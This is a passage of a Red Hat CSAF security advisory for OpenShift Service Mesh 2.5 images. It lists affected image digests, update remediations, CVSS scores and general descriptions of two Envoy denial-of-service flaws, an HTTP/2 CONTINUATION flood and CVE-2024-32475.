"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood"
},
{
"cve": "CVE-2024-32475",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2024-04-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2276149"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32475"
},
{
"category": "external",
"summary": "RHBZ#2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32475",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32475"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382",
"url": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj"
}
],
"release_date": "2024-04-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
